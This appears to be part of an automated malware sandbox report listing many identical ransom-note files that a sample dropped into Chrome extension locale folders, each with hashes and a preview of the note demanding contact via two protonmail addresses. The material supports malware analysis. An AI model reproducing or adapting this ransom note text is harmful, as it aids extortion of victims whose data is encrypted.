                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mn\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\my\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ne\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pa\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\si\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sw\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ta\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\te\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
